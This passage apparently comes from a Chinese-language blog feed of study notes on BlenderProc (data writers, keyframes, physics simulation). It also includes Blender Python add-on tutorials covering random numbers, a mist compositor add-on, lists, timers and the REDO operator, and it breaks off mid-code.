    ​ 通过使用,所有对应于同一帧的给定数据都打包到一个文件中。 这样做的好处是所有数据都被压缩,不同帧的数据不会混淆。bproc.writer.write_hdf5``.hdf5

    ​ 要可视化给定的 hdf5 文件,您可以使用 BlenderProcs CLI:

    1
    blenderproc vis hdf5 <path_to_file>

    ​ 如果你想读取数据处理代码中的文件,你可以使用 python 包:.hdf5h5py

    1
    2
    3
    import h5py
    with h5py.File("myfile.hdf5") as f:
    colors = np.array(f["colors"])

    ​ 要读取保存在 hdf5 文件中的 json 字符串(例如对象姿势),您可以使用以下代码片段:

    1
    2
    text = np.array(f["object_states"]).tostring()
    obj_states = json.loads(text)

    Coco Writer

    ​ 通过 ,渲染的实例分段以 COCO 格式编写。 在此处阅读有关此格式规格的更多信息 bproc_writer.write_coco_annotations

    ​ 要可视化以 COCO 格式编写的帧,您可以使用 BlenderProcs CLI:

    1
    blenderproc vis coco <path_to_file>

    BOP Writer

    ​ 使用 、深度和 RGB 图像以及相机内在和外在都存储在 BOP 数据集中。 在此处阅读有关 BOP 格式规格的更多信息bproc.writer.write_bop

    How key frames work

    ​ Blender 和 BlenderProc 使用关键帧在一个渲染调用中渲染多个图像。 这使得渲染相同的场景(例如,只有不同的摄像机姿势)更快,因为网格只需移动到显卡一次。

    Concept

    ​ 调用时,Blender 将遍历间隔中的所有关键帧,并为每个关键帧渲染一次场景。 因此,可以将每个关键帧分配给不同的属性值,例如相机或对象姿势,这些属性值将在渲染相应关键帧时设置。bproc.renderer.render() [frame_start, frame_end - 1]

    Camera

    ​ 一开始,frame_startframe_end都设置为0。调用bproc.camera.add_camera_pose(matrix_world)时,会自动添加一个新的关键帧(frame_end会增加1),并将给定的相机姿态分配给它。您也可以通过bproc.camera.add_camera_pose(matrix_world, i)将相机姿态设置为特定的关键帧,如果需要,frame_end也会相应地增加。

    Objects

    ​ 当设置物体姿态时,例如通过obj.set_location(location),它们默认会为所有关键帧设置。如果您想将物体姿态分配到特定的帧上,则可以使用参数:frame。例如,obj.set_location(location, frame=i)

    Debugging

    ​ 要检查实际设置了哪些关键帧,可以在 BlenderProcs 调试模式下查看它们(请阅读快速入门以了解如何进入调试模式)。运行脚本后,切换到 Layout 选项卡。

    ​ 在布局选项卡中,您应该看到 Blender 的下半部分区域。在该区域中,您应该看到当前活动对象的关键帧。在 3D 视图中对相机执行左键单击,以查看所有注册的相机姿态。每个已注册的关键帧都通过黄色标记进行可视化。Timeline

    ​ 您可以通过移动蓝色播放头或在右上角设置起始/结束数字来更改当前活动帧。 3D 视图始终显示分配给当前活动帧的场景状态(按Numpad0 键可查看当前相机视图的场景)。

    Render multiple times

    ​ 在一个会话中可以多次渲染。唯一需要记住的是在每次运行开始时要删除所有关键帧,可以通过调用bproc.utility.reset_keyframes()来完成。

    ​ 因此,假设您的Python脚本具有以下结构:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    <object loading>

    <light setting>

    <setting random object poses>

    <camera sampling>

    <rendering>

    <writing to file>

    ​ 要在一次运行中进行摄像机/物体姿态采样和多次渲染,只需按以下方式调整脚本:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    <object loading>

    <light creation>

    for r in range(NUM_RUNS):
    bproc.utility.reset_keyframes()

    <setting random object poses>

    <setting random light poses & strengths>

    <camera sampling>

    <rendering>

    <writing to file>

    ​ 其他属性(例如物体材质)不能设置为关键帧,因此一个渲染路径的所有图像都将包含相同的材质。对于这些属性,最好使用单个或少量关键帧频繁调用渲染函数,在渲染调用之间进行操作。

    Physics simulation

    ​ 例如,要将对象随机放置在给定的表面上,BlenderProc 可以使用 Blender 的刚体模拟器。简而言之,使用该模拟器,物体被放置在表面上,然后固定在它们停止的位置上。

    Rigidy body components

    ​ 为了使物体参与模拟,需要通过函数.enable_rigidbody()启用其刚体组件。使用该函数,可以指定所有物理属性(如质量、摩擦等)。

    The parameteractive

    ​ 该参数(active)确定物体是否应积极参与模拟(即是否应该移动),还是作为障碍物(active =True =False)。

    The parametercollision_shape

    ​ 选择collision_shape对于实现稳定的模拟至关重要。如果您的物体是凸面的,或者您不介意它的碰撞形状是它的凸包,那么您应该选择默认值CONVEX_HULL。这将导致快速且稳定的模拟。

    ​ 但是,如果您有非凸面的物体并且希望获得精确的结果,则可能无法使用CONVEX_HULL。您可以使用MESH代替,但是特别是如果物体有薄部分,则这将使模拟非常不稳定,并且您的物体可能会互相穿透。

    Convex decomposition
    1
    2
    obj.enable_rigidbody(active=True, collision_shape="COMPOUND")
    obj.build_convex_decomposition_collision_shape("<Path where to store vhacd>")

    ​ 首先,启用您的物体的刚体元素,并将其碰撞形状设置为COMPOUND。这意味着它的碰撞形状将是其子对象的碰撞形状(即凸面部分)的并集。

    ​ 第二个命令将对物体执行凸分解,并将其凸面部分设置为原始物体的子对象。这些子对象在渲染中不可见,只用作碰撞形状!由于凸分解每个物体需要几秒钟的计算时间,因此结果将被缓存,并在同一物体上再次执行凸分解时自动重复使用。

    Run the simulation

    Simulate and fix poses afterwards

    在通常的用例中,可以使用以下命令:

    1
    2
    3
    4
    5
    bproc.object.simulate_physics_and_fix_final_poses(
    min_simulation_time=4,
    max_simulation_time=20,
    check_object_interval=1
    )

    ​ 这将运行模拟,随后修复每个物体的最终静止姿态(模拟本身将被丢弃)。运行物理模拟时,模块以1秒为间隔检查是否仍有物体在移动。如果不是这种情况,模拟将停止。但是,模拟至少运行4秒,最多运行20秒。

    bproc.object.simulate_physics_and_fix_final_poses() 函数用于模拟物理行为并修正最终的位置和姿态。具体而言,该函数会首先对物体进行一定时间范围内的物理模拟,并在模拟结束后修正物体在场景中的最终位置和姿态。这个函数可以用于在场景中添加更真实的物理效果,例如模拟某个物体从桌子上掉落到地面上的过程。

    该函数接受以下参数:

    • min_simulation_time(可选):最短的物理模拟时间。默认值为 4。
    • max_simulation_time(可选):最长的物理模拟时间。默认值为 20。
    • check_object_interval(可选):定期检查物体位置和姿态的时间间隔。默认值为 1。

    需要注意的是,该函数只适用于带有物理信息的物体。要使用该函数,物体必须已经被标记为可进行物理模拟。这可以通过在 Blender 中为物体设置适当的物理属性来完成。例如,在 Blender 中可以将物体的刚体类型设置为 RIGID_BODY,以启用物理模拟。

    Just simulate

    ​ 如果您想要渲染模拟本身,请使用以下命令:

    1
    2
    3
    4
    5
    bproc.object.simulate_physics(
    min_simulation_time=4,
    max_simulation_time=20,
    check_object_interval=1
    )

    ​ 这类似于bproc.object.simulate_physics_and_fix_final_poses,但整个模拟将被保留。因此,如果之后渲染场景,它将显示模拟本身。

    您可能需要手动增加渲染间隔:

    1
    2
    # This will make the renderer render the first 100 frames of the simulation
    bproc.utility.set_keyframe_render_interval(frame_end=100)

    Examples

    • BlenderProc/README.md at main · DLR-RM/BlenderProc · GitHub

    • BlenderProc的核心示例集合。通过这些示例,您可以学习如何使用BlenderProc运行流水线,从而生成各种类型的渲染图像。

      • 基本示例:介绍了BlenderProc的基本功能以及在运行流水线时会发生的事情。
      • 相机采样:演示如何在形状内对不同相机位置进行采样,并设置旋转约束。
      • 光照采样:展示如何在几何形状内对光源姿态进行采样。
      • 实体操作:通过选择配置文件中的实体来更改其各种参数。
      • 材质操作:展示了如何选择和操作材质。
      • 物理定位:演示了如何启用场景中对象之间的简单模拟物理交互。
      • 语义分割:提供了生成给定场景的语义分割标签的方法。
      • 相机和物体姿态:介绍了如何根据相机内参和外参加载和渲染模型。

      我们建议从基本示例开始,按顺序逐步完成每个示例。这样做可以让你更好的掌握BlenderProc的基本功能,并逐步深入到更高级的示例中。

    ]]>
    @@ -6350,7 +6350,7 @@ /posts/Software-Blender%20&%20Python%20(21-30)/ - 课程

    How to Generate Random Numbers

    教你怎么用随机数:

    Python Console 下:

    • import random 导入随机数模块

    • random.uniform(0, 1) 生成一个 0-1 的随机浮点数,服从均匀分布

    • random.choice(range(0,10)) 生成一个 0-10(不包含 10)的随机整数,服从均匀分布

    Blender 下 print() 的输出可以在 Window-Toggle System Console 里显示。

    png

    将随机数用在插件中的示例:

    import bpy
    import random
    from bpy.types import Panel, Operator, PropertyGroup
    from bpy.props import FloatProperty, PointerProperty, IntProperty


    class MyProperties(PropertyGroup):
    random_number : IntProperty(name='Random Number', default=0)
    text_list = ['A', 'B', 'C']
    icon_list = ['GHOST_DISABLED', 'MATERIAL', 'PINNED']


    class ADDONNAME_PT_main_panel(Panel):
    bl_label = "Main Panel"
    bl_idname = "ADDONNAME_PT_main_panel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = "New Tab"

    def draw(self, context):
    layout = self.layout
    scene = context.scene
    mytool = scene.my_tool

    layout.label(text=mytool.text_list[mytool.random_number])
    layout.label(icon=mytool.icon_list[mytool.random_number])
    layout.prop(mytool, "random_number")
    layout.operator("addonname.myop_operator")


    class ADDONNAME_OT_my_op(Operator):
    bl_label = "Generate Random Number"
    bl_idname = "addonname.myop_operator"

    def execute(self, context):
    scene = context.scene
    mytool = scene.my_tool

    x = random.choice(range(0, 3))
    mytool.random_number = x
    print(x)

    return {'FINISHED'}


    classes = [MyProperties, ADDONNAME_PT_main_panel, ADDONNAME_OT_my_op]


    def register():
    for cls in classes:
    bpy.utils.register_class(cls)
    bpy.types.Scene.my_tool = PointerProperty(type=MyProperties)


    def unregister():
    for cls in classes:
    bpy.utils.unregister_class(cls)
    del bpy.types.Scene.my_tool


    if __name__ == "__main__":
    register()

    开跑,按下 Generate Random Number,就会生成一个随机数,并导致面板标题和图标的变化。

    png

    Add-on Creation - Insta-Mist

    比起原先的代码,加了一些节点存在性检查:

    comp_node = tree.nodes.get('Composite')
    if comp_node is None:
    comp_node = tree.nodes.new('CompositorNodeComposite')
    comp_node.name = 'Composite'
    render_layer_node = tree.nodes.get('Render Layers')
    if render_layer_node is None:
    render_layer_node = tree.nodes.new('CompositorNodeRLayers')
    render_layer_node.name = 'Render Layers'
    mix1 = tree.nodes.get('Mix')
    if mix1 is not None:
    tree.nodes.remove(mix1)

    mix2 = tree.nodes.get('Mix.001')
    if mix2 is not None:
    tree.nodes.remove(mix2)

    cr = tree.nodes.get('ColorRamp')
    if cr is not None:
    tree.nodes.remove(cr)

    这段代码是一个基于 Blender 的插件,用于在 3D 视图中添加雾效果。主要包含三个类 INSTAMIST_PT_main_panel、INSTAMIST_PT_sub_panel 和 INSTAMIST_OT_add_mist。

    其中 INSTAMIST_PT_main_panel 是主面板类,包含一个按钮“Add Mist”,点击按钮会触发 INSTAMIST_OT_add_mist 类的 execute 方法来开启或关闭雾效果。

    INSTAMIST_PT_sub_panel 是子面板类,当且仅当场景的视图层使用了 pass_mist 属性才会显示面板,其中包括了 start、depth 和 falloff 这三个属性来控制雾的起始位置、深度和衰减程度。

    最后 INSTAMIST_OT_add_mist 是操作员类,通过 execute 方法来根据当前状态开启或关闭雾效果,并对节点树进行相应的操作。如果开启雾效果,则会调用 mist_comp_action 方法来添加新的节点,否则会移除原有的节点。

    bl_info = {
    "name": "INSTAMIST",
    "author": "Darkfall",
    "version": (1, 0),
    "blender": (2, 90, 1),
    "location": "View3D > N > INSTA-MIST",
    "description": "Adds Mist to your scene along with arranging the compositor",
    "warning": "",
    "doc_url": "",
    "category": "Add Mist",
    }


    import bpy
    from bpy.types import Panel, Operator


    def mist_comp_action(context):
    tree = context.scene.node_tree

    comp_node = tree.nodes.get('Composite')
    if comp_node is None:
    comp_node = tree.nodes.new('CompositorNodeComposite')
    comp_node.name = 'Composite'
    comp_node.location = (700, 0)

    viewer_node = tree.nodes.new('CompositorNodeViewer')
    viewer_node.location = (700, 200)

    render_layer_node = tree.nodes.get('Render Layers')
    if render_layer_node is None:
    render_layer_node = tree.nodes.new('CompositorNodeRLayers')
    render_layer_node.name = 'Render Layers'
    render_layer_node.location = (-200, 0)

    mix_node = tree.nodes.new('CompositorNodeMixRGB')
    mix_node.location = (500, 0)
    mix_node.blend_type = 'ADD'
    mix_node.use_clamp = True

    mix2_node = tree.nodes.new('CompositorNodeMixRGB')
    mix2_node.location = (300, 0)
    mix2_node.blend_type = 'MULTIPLY'
    mix2_node.use_clamp = True

    cr_node = tree.nodes.new('CompositorNodeValToRGB')
    cr_node.location = (0, 0)
    cr_node.color_ramp.elements[0].color = (0.2, 0.2, 0.2, 1)
    cr_node.color_ramp.elements.new(position= 0.27)

    link = tree.links.new

    link(mix_node.outputs[0], viewer_node.inputs[0])
    link(mix_node.outputs[0], comp_node.inputs[0])
    link(mix2_node.outputs[0], mix_node.inputs[1])
    link(cr_node.outputs[0], mix2_node.inputs[1])
    link(render_layer_node.outputs[0], mix_node.inputs[2])
    link(render_layer_node.outputs[3], cr_node.inputs[0])
    return {'FINISHED'}



    class INSTAMIST_PT_main_panel(Panel):
    bl_label = "INSTA-MIST"
    bl_idname = "INSTAMIST_PT_main_panel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = "INSTA-MIST"

    def draw(self, context):
    layout = self.layout
    scene = context.scene


    layout.operator("instamist.add_mist_operator")


    class INSTAMIST_PT_sub_panel(Panel):
    bl_label = "INSTA-MIST Options"
    bl_idname = "INSTAMIST_PT_sub_panel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = "INSTA-MIST"
    bl_parent_id = 'INSTAMIST_PT_main_panel'

    @classmethod
    def poll(cls, context):
    return (context.scene.view_layers["ViewLayer"].use_pass_mist == True
    )

    def draw(self, context):
    layout = self.layout
    scene = context.scene
    world = scene.world.mist_settings

    layout.prop(world, "start")
    layout.prop(world, "depth")
    layout.prop(world, "falloff")


    class INSTAMIST_OT_add_mist(Operator):
    bl_label = "Enable/Disable Mist"
    bl_idname = "instamist.add_mist_operator"



    def execute(self, context):
    scene = context.scene
    camera = bpy.data.cameras['Camera']
    vl = scene.view_layers["ViewLayer"]
    tree = scene.node_tree

    if vl.use_pass_mist == False:
    vl.use_pass_mist = True
    camera.show_mist = True
    if scene.use_nodes == False:
    scene.use_nodes = True
    mist_comp_action(context)

    elif vl.use_pass_mist == True:
    vl.use_pass_mist = False
    camera.show_mist = False

    mix1 = tree.nodes.get('Mix')
    if mix1 is not None:
    tree.nodes.remove(mix1)

    mix2 = tree.nodes.get('Mix.001')
    if mix2 is not None:
    tree.nodes.remove(mix2)

    cr = tree.nodes.get('ColorRamp')
    if cr is not None:
    tree.nodes.remove(cr)

    comp_node = tree.nodes.get('Composite')
    viewer_node = tree.nodes.get('Viewer')
    render_layer_node = tree.nodes.get('Render Layers')

    tree.links.new(render_layer_node.outputs[0], comp_node.inputs[0])
    tree.links.new(render_layer_node.outputs[0], viewer_node.inputs[0])
    return {'FINISHED'}


    classes = [INSTAMIST_PT_main_panel, INSTAMIST_OT_add_mist, INSTAMIST_PT_sub_panel]



    def register():
    for cls in classes:
    bpy.utils.register_class(cls)


    def unregister():
    for cls in classes:
    bpy.utils.unregister_class(cls)


    if __name__ == "__main__":
    register()

    开跑!按下 Enable/Disable Mist 后,会在 Compositor 生成/删除节点,以 开启/关闭 雾效果。

    png

    按下 F12 就可以看到渲染后的效果:

    png

    Lists - Create, Append and Remove

    教你怎么用 python 里的 list:

    • list.append() 追加一个元素
    • list.remove() 删除一个元素
    • list.extend() 追加多个元素
    • list.clear() 清空列表
    import bpy
    from bpy.types import Panel, Operator, PropertyGroup
    from bpy.props import EnumProperty, PointerProperty, StringProperty


    class MyProperties(PropertyGroup):

    my_enum : EnumProperty(
    name= "Enumerator / Dropdown",
    description= "sample text",
    items= [('OP1', "Append", ""),
    ('OP2', "Remove", "")
    ]
    )

    new_item : StringProperty()
    my_list = []

    class ADDONNAME_PT_main_panel(Panel):
    bl_label = "Main Panel"
    bl_idname = "ADDONNAME_PT_main_panel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = "New Tab"

    def draw(self, context):
    layout = self.layout
    scene = context.scene
    mytool = scene.my_tool


    layout.prop(mytool, "my_enum", expand=True)
    layout.prop(mytool, 'new_item')
    layout.operator("addonname.myop_operator")





    class ADDONNAME_OT_my_op(Operator):
    bl_label = "Submit"
    bl_idname = "addonname.myop_operator"

    def execute(self, context):
    scene = context.scene
    mytool = scene.my_tool
    list = mytool.my_list
    enum = mytool.my_enum
    new_item = mytool.new_item

    a = 'alpha'
    b = 'beta'

    if enum == 'OP1':
    if a and b not in list:
    list.extend((a, b))
    if new_item != '':
    if new_item not in list:
    list.append(new_item)
    else:
    list.clear()
    print(list)

    return {'FINISHED'}




    classes = [MyProperties, ADDONNAME_PT_main_panel, ADDONNAME_OT_my_op]


    def register():
    for cls in classes:
    bpy.utils.register_class(cls)

    bpy.types.Scene.my_tool = PointerProperty(type= MyProperties)

    def unregister():
    for cls in classes:
    bpy.utils.unregister_class(cls)
    del bpy.types.Scene.my_tool



    if __name__ == "__main__":
    register()

    png

    How to Display Info Messages

    介绍了一些可以将消息输出至 Info 的语句:

    • self.report({'INFO'}, "This is a Custom Message")
    • self.report({'WARNING'}, "This is a Custom Message")
    • self.report({'ERROR'}, "This is a Custom Message")

    Why is it not Working? : Episode 1

    教你怎么调试错误。

    How to make a Random Word Generator

    写了一个随机单词生成器:

    bl_info = {
    "name": "Random Word Generator",
    "author": "Darkfall",
    "version": (1, 0),
    "blender": (2, 90, 1),
    "location": "View3D > N > Random Word Gen Tab",
    "description": "Generates a Random Phrase",
    "warning": "",
    "doc_url": "",
    "category": "Add Words",
    }

    import bpy
    from bpy.types import Panel, Operator, PropertyGroup
    from bpy.props import IntProperty, PointerProperty, BoolProperty
    from random import randint


    class RandomWordGenProperties(PropertyGroup):

    list_a = ["A", "Dr", "Mr", "Mrs", "Our", "The"]

    list_b = ["Adorable", "Adventurous", "Agressive", "Agreeable", "Angry", "Annoyed", "Annoying", "Anxious", "Arrogant", "Attractive", "Average", "Awful", "Bad", "Beautiful", "Better", "Bewildered", "Bloody", "Blushing", "Bored", "Brainy", "Brave", "Breakable", "Bright", "Broken", "Bronze", "Busy", "Calm", "Careful", "Cautious", "Charming", "Cheerful", "Clean", "Clear", "Clever", "Cloudy", "Clumsy", "Colorful", "Comfortable", "Condemned", "Confused", "Cooperative", "Courageous", "Crazy", "Creepy", "Crowded", "Cruel", "Curious", "Cute", "Dangerous", "Dark", "Dead", "Defeated", "Defiant", "Delightful", "Depressed", "Determained", "Different", "Difficult", "Disgusted", "Doubtful", "Dull", "Eager", "Easy", "Elated", "Elegant", "Embarrassed", "Enchanting", "Encouraging", "Energetic", "Enthusiastic", "Envious", "Evil", "Excited", "Expensive", "Exuberant", "Faithful", "Famous", "Fancy", "Fantastic", "Fierce", "Filthy", "Fine", "Foolish", "Fragile", "Frail", "Frantic", "Friendly", "Frightened", "Frozen", "Funny", "Gentle", "Gifted", "Glamorous", "Gleaming", "Glorious", "Good", "Gold", "Golden", "Gorgeous", "Graceful", "Greiving", "Grotesque", "Grumpy", "Handsome", "Happy", "Healthy", "Helpful", "Helpless", "Hilarious", "Horrible", "Hungry", "Hurt", "Important", "Impossible", "Industrial", "Inexpensive", "Innocent", "Inquisitive", "Itchy", "Jelous", "Jolly", "Joyous", "Kind", "Lazy", "Light", "Lively", "Lonely", "Long", "Lovely", "Lucky", "Magnificent", "Misty", "Modern", "Motionless", "Muddy", "Mushy", "Mysterious", "Nasty", "Naughty", "Nervous", "Never-ending", "Nice", "Obedient", "Obnoxious", "Odd", "Old", "Old-fashoined", "Open", "Outrageous", "Outstanding", "Perfect", "Plain", "Pleasant", "Poised", "Poor", "Powerful", "Precious", "Proud", "Putrid", "Puzzled", "Quaint", "Real", "Relieved", "Repulsive", "Rich", "Righteous", "Rival", "Rusty", "Secret", "Scary", "Silver", "Silvery", "Selfish", "Shiny", "Shy", "Silly", "Sleepy", "Smiling", "Sore", "Sparkling", "Splendid", "Spotless", "Stalking", "Steady", "Strange", "Stranger", "Stupid", "Subtle", "Successful", "Super", "Talented", "Tame", "Tender", "Tense", "Terrible", "Thankful", "Thoughful", "Thoughtless", "Tired", "Tough", "Troubled", "Ugliest", "Ugly", "Unsightly", "Unusual", "Upset", "Uptight", "Vast", "Victorious", "Wandering", "Weary", "Wicked", "Wild", "Witty", "Worried", "Wrong", "Zelous"]

    list_c = ["Actor", "Anchor", "Antagonist", "Apple", "Angel", "Angle", "Army", "Astronaut", "Ball", "Balloon", "Beach", "Bear", "Beast", "Book", "Brain", "Cake", "Castle", "Coast", "Colony", "Complex", "Conundrum", "Core", "Crowd", "Dancer", "Detective", "Detector", "Devil", "Director", "Diver", "Driver", "Express", "Factory", "Family", "Forest", "Future", "Gamer", "Garden", "Hacker", "Hangman", "History", "House", "Idea", "Island", "Jail", "Jester", "Joker", "King", "Knight", "Lake", "Lighthouse", "Matrix", "Mind", "Monument", "Moon", "Mountain", "Navy", "Nail", "Night", "Office", "Officer", "Operator", "Page", "Park", "Path", "Pickle", "Pizza", "Place", "Planet", "Player", "Picture", "Price", "Prince", "Princess", "Prison", "Program", "Programmer", "Protagonist", "Queen", "Razor", "Rifle", "Ring", "Reptile", "Road", "River", "Science", "Situation", "Society", "Soldier", "Sound", "Steed", "Story", "Surface", "Tavern", "Tower", "Traveler", "Tree", "Undead", "Unicorn", "Vampire", "Warrior", "Wizard", "World", "Wolf", "Zombie"]

    number_1 : IntProperty(default= 0)
    number_2 : IntProperty(default= 0)
    number_3 : IntProperty(default= 0)

    number_4 : IntProperty(default= 1)

    word_count : IntProperty(default= 3, min= 1, max= 3, description= "Select How Many Words to be Generated")

    wc_bool : BoolProperty(default= False, description= "Selecting this Option will randomize the Word Count")


    class RANDOMWORDGEN_PT_main_panel(Panel):
    bl_label = "Random Word Generator"
    bl_idname = "RANDOMWORDGEN_PT_main_panel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = "Random Word Gen"

    def draw(self, context):
    layout = self.layout
    scene = context.scene
    mytool = scene.my_tool

    wc = mytool.word_count
    r_wc = mytool.wc_bool

    if r_wc == False:
    layout.prop(mytool, "word_count", text= "Word Count")
    row = layout.row()

    if wc >= 1:
    row.label(text= mytool.list_a[mytool.number_1])
    if wc >= 2:
    row.label(text= mytool.list_b[mytool.number_2])
    if wc >= 3:
    row.label(text= mytool.list_c[mytool.number_3])
    else:
    row = layout.row()
    if mytool.number_4 >= 1:
    row.label(text= mytool.list_a[mytool.number_1])
    if mytool.number_4 >= 2:
    row.label(text= mytool.list_b[mytool.number_2])
    if mytool.number_4 >= 3:
    row.label(text= mytool.list_c[mytool.number_3])
    layout.prop(mytool, "wc_bool", text= "Randomize Word Count")

    layout.operator("randomwordgen.myop_operator")


    class RANDOMWORDGEN_OT_my_op(Operator):
    bl_label = "Generate Random Words"
    bl_idname = "randomwordgen.myop_operator"


    def execute(self, context):
    scene = context.scene
    mytool = scene.my_tool

    a = 0

    b2 = len(mytool.list_a)
    b = b2 - 1

    c2 = len(mytool.list_b)
    c = c2 - 1

    d2 = len(mytool.list_c)
    d = d2 - 1

    e = 1
    f = 3

    r1 = randint(a, b)
    r2 = randint(a, c)
    r3 = randint(a, d)

    r4 = randint(e, f)

    mytool.number_1 = r1
    mytool.number_2 = r2
    mytool.number_3 = r3

    mytool.number_4 = r4

    return {'FINISHED'}


    classes = [RandomWordGenProperties, RANDOMWORDGEN_PT_main_panel, RANDOMWORDGEN_OT_my_op]


    def register():
    for cls in classes:
    bpy.utils.register_class(cls)

    bpy.types.Scene.my_tool = PointerProperty(type= RandomWordGenProperties)


    def unregister():
    for cls in classes:
    bpy.utils.unregister_class(cls)
    del bpy.types.Scene.my_tool


    if __name__ == "__main__":
    register()

    点击 Generate Random Words 就可以从单词库中生成一堆单词!

    png

    Application Timers

    这段代码是一个简单的 Blender Python 脚本,用于创建 10 个位置不同的立方体。该脚本使用了 Blender 的定时器功能,以便在指定时间间隔内反复调用函数 “run_10_times()”。

    首先,使用 import bpy 导入必要的 Blender Python 模块。

    然后,创建了全局变量 counter 和 loc, 分别用于追踪立方体数量和立方体位置。

    接下来定义函数 run_10_times(), 它会在启动定时器后被调用。该函数使用 bpy.ops.mesh.primitive_cube_add() 命令在场景中添加一个立方体。该命令需要一个位置参数,它将使用 loc 变量中的值来确定立方体的垂直位置。然后,counter 变量增加 1,loc 变量增加 2(以确保每个立方体都有不同的位置)。

    函数还打印出当前计数器值。

    如果 counter 变量的值达到 10,函数返回 None,以便停止定时器。否则,它将返回 0.5,以便等待一段时间(0.5s)后再次调用该函数。

    最后,通过 bpy.app.timers.register() 函数注册函数 run_10_times(),以便在 Blender 中启动定时器。该函数将在 Blender 界面中点击 “Run Script” 按钮后执行。

    总之,该脚本使用 Blender Python 的定时器功能,创建 10 个位置不同的立方体,每个立方体之间延迟一定时间。

    import bpy

    counter = 0
    loc = 0


    def run_10_times():
    global loc
    bpy.ops.mesh.primitive_cube_add(location=(0, loc, 0))
    global counter
    counter += 1
    loc += 2
    print(counter)
    if counter == 10:
    return None
    return 0.5


    bpy.app.timers.register(run_10_times)

    png

    Why is it not Working? : Episode 2

    这段代码是一个 Blender 插件的示例,定义了一个面板和一个操作符。该插件提供了一些功能来添加粒子系统到选择的对象中。

    首先,导入必要的模块,包括 bpy 和 Panel、Operator 类型。

    接下来定义了一个面板类 ADDONNAME_PT_main_panel,并从 Panel 类继承。在这个类中设置了一些属性,例如名称、区域类型和分类等。draw() 方法用于绘制面板中的内容,在这里使用 layout 属性创建了三个控件,包括两个用于设置粒子系统参数的属性和一个用于执行操作的按钮。

    然后定义了一个操作符 ADDONNAME_OT_my_op,并从 Operator 类继承。在这个类中设置了一些属性,例如名称和 ID 名称等。execute() 方法是操作符的核心部分,它将在用户按下按钮时被调用。在这里,它使用 bpy.ops.object.particle_system_add() 命令向选定的对象中添加了一个粒子系统。

    最后,将 ADDONNAME_PT_main_panel 和 ADDONNAME_OT_my_op 类添加到 classes 列表中,并使用 bpy.utils.register_class() 函数注册这些类。同样,使用 unregister() 函数在插件不再需要时注销这些类。

    如果这个脚本是直接运行的,那么它将调用 register() 方法并注册这些类。如果该脚本作为其他插件的一部分被导入,则 register() 方法不会被调用。

    import bpy
    from bpy.types import Panel, Operator


    class ADDONNAME_PT_main_panel(Panel):
    bl_label = "Main Panel"
    bl_idname = "ADDONNAME_PT_main_panel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = "New Tab"


    def draw(self, context):
    layout = self.layout

    p_data = bpy.data.particles["ParticleSettings"]

    layout.prop(p_data, "count")
    layout.prop(p_data, "use_rotations")
    if p_data.use_rotations == True:
    layout.prop(p_data, "rotation_factor_random")
    layout.operator("addonname.myop_operator")


    class ADDONNAME_OT_my_op(Operator):
    bl_label = "Add Particle System"
    bl_idname = "addonname.myop_operator"
    """Add a Particle System to your Selected Object"""


    def execute(self, context):
    scene = context.scene
    obj = context.object
    bpy.ops.object.particle_system_add()
    return {'FINISHED'}


    classes = [ADDONNAME_PT_main_panel, ADDONNAME_OT_my_op]


    def register():
    for cls in classes:
    bpy.utils.register_class(cls)


    def unregister():
    for cls in classes:
    bpy.utils.unregister_class(cls)


    if __name__ == "__main__":
    register()

    The REDO Operator

    这段代码是 Blender 插件的示例,定义了一个面板和一个操作符。该插件提供一个按钮,点击后会在当前场景中添加一个立方体。

    首先导入必要的模块,包括 bpy 和 Panel、Operator 类型。

    然后定义了一个面板类 ADDONNAME_PT_main_panel,并从 Panel 类继承。在这个类中设置了一些属性,例如名称、区域类型和分类等。draw() 方法用于绘制面板中的内容,在这里使用 layout 属性创建了一个控件,即一个按钮,并使用 layout.operator() 函数将其添加到面板中。

    接着定义了一个操作符 ADDONNAME_OT_my_op,并从 Operator 类继承。在这个类中设置了一些属性,例如名称和 ID 名称等。bl_options 属性指定了操作符的行为,包括注册和撤销。loc 属性是一个 FloatVectorProperty,表示要添加的立方体的位置。

    execute() 方法是操作符的核心部分,它将在用户按下按钮时被调用。在这里,它使用 bpy.ops.mesh.primitive_cube_add() 命令向当前场景中添加了一个立方体,位置由 self.loc 属性决定。

    最后,将 ADDONNAME_PT_main_panel 和 ADDONNAME_OT_my_op 类添加到 classes 列表中,并使用 bpy.utils.register_class() 函数注册这些类。同样,使用 unregister() 函数在插件不再需要时注销这些类。

    如果这个脚本是直接运行的,那么它将调用 register() 方法并注册这些类。如果该脚本作为其他插件的一部分被导入,则 register() 方法不会被调用。

    • bl_options = {'REGISTER', 'UNDO'}

      • bl_options 是一个操作符的属性,用于指定该操作符的行为。它是一个包含字符串的集合,可以指定以下选项:

        • REGISTER:表示将该操作作为已注册的操作来显示,即将其添加到撤销历史记录中。如果未启用此选项,则执行该操作不会被记录在撤销历史记录中。
        • UNDO:表示该操作可被撤销。如果未启用此选项,则在执行该操作后无法撤消该操作。

        在代码示例中,bl_options 属性被设置为 {‘REGISTER’, ‘UNDO’},表示该操作符应被注册并可以被撤销。这样一来,当用户单击添加的按钮时,该操作的执行将被记录在撤销历史记录中,并且用户可以随时撤消该操作。

    • 在 Blender 中,可以使用 Ctrl + Z 快捷键或 Edit 菜单中的 Undo 命令来撤消先前执行的操作。如果你想一次性撤销多个操作,可以多次按下 Ctrl + Z 或多次选择 Undo 命令。

      如果你想恢复先前撤消的操作,可以使用 Ctrl + Shift + Z 快捷键或 Edit 菜单中的 Redo 命令来重做操作。同样,你可以多次按下 Ctrl + Shift + Z 或多次选择 Redo 命令以重复多个操作。

    import bpy
    from bpy.types import Panel, Operator


    class ADDONNAME_PT_main_panel(Panel):
    bl_label = "Main Panel"
    bl_idname = "ADDONNAME_PT_main_panel"
    bl_space_type = 'VIEW_3D'
    bl_region_type = 'UI'
    bl_category = "New Tab"


    def draw(self, context):
    layout = self.layout

    layout.operator("addonname.myop_operator")


    class ADDONNAME_OT_my_op(Operator):
    bl_label = "Button"
    bl_idname = "addonname.myop_operator"
